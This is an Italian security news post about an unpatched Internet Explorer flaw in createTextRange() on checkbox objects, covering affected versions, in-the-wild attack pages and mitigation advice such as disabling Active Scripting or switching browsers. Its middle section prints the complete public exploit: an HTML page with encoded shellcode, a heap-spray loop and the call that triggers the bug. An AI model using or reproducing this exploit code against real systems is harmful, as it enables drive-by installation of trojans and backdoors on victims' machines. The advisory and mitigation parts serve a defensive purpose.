Falla non corretta in IE, i giorni passano e i rischi aumentano

Giorno 23 Microsoft ha ufficialmente riconosciuto e informato gli utenti windows di una grossa vulnerabilità nel browser Internet Explorer che consentirebbe ad un utente malintenzionato l'esecuzione di codice arbitrario nella macchina vittima. (Microsoft Security Advisory 917077)

La falla risiede nella funzione createTextRange() che non viene processata bene quando la chiamata è associata ad un oggetto di tipo checkbox. Una pagina html creata ad hoc potrebbe sfruttare l'errore nella libreria dinamica per rendere vulnerabile il sistema ad attacchi da remoto. (Secunia Advisory)

Il bug non è stato ancora risolto, le versioni a rischio sono IE7 beta, IE6 SP2 e precedenti ma l'ultimo aggiornamento IE7 beta2 Refresh è immune a questa tipologia di attacco.

 Il codice exploit è stato reso pubblico, e approfittando dell'assenza di patch molti attacker hanno messo su pagine web che sfruttano questa vulnerabilità per eseguire ed installare trojan, spyware, backdoor e codici maligni di ogni genere nella macchina (windows) vititma. Secondo l'ultimo aggiornamento su Websense, sono state identificate circa 200 pagine che sfruttano questa vulnerabilità per eseguire il codice exploit. (Websense I.E. zero-day update)

Codice Exploit:

<input type="checkbox" id="blah"> <SCRIPT language="javascript"> shellcode = unescape( "%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" + "%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" + "%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" + "%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" + "%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" + "%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" + "%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" + "%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" + "%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" + "%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + "%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" + "%uCC4A%uD0FF");     bigblock = unescape("%u9090%u9090");     slackspace = 20 + shellcode.length     while (bigblock.length < slackspace) bigblock += bigblock;     fillblock = bigblock.substring(0, slackspace);     block = bigblock.substring(0, bigblock.length-slackspace);     while(block.length + slackspace < 0x40000) block = block + block + fillblock;     memory = new Array();     for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode;       var r = document.getElementById('blah').createTextRange(); </script>

Soluzione: Microsoft non ha ancora rilasciato nessuna patch ma consiglia di disattivare l'Active Scripting per evitare l'esecuzione dello script. Nell'attesa che Microsoft provveda (spero presto) a tappare questo buco, la soluzione migliore sarebbe quella di cambiare browser e passare a Opera o Firefox, altrimenti aggiornare il browser a IE7 beta2 Refresh

L'e-mail rappresenta un potenziale attacco, è importante prestare attenzione a non cliccare nelle url contenute nei messaggi di posta provenienti da fonti non attendibili.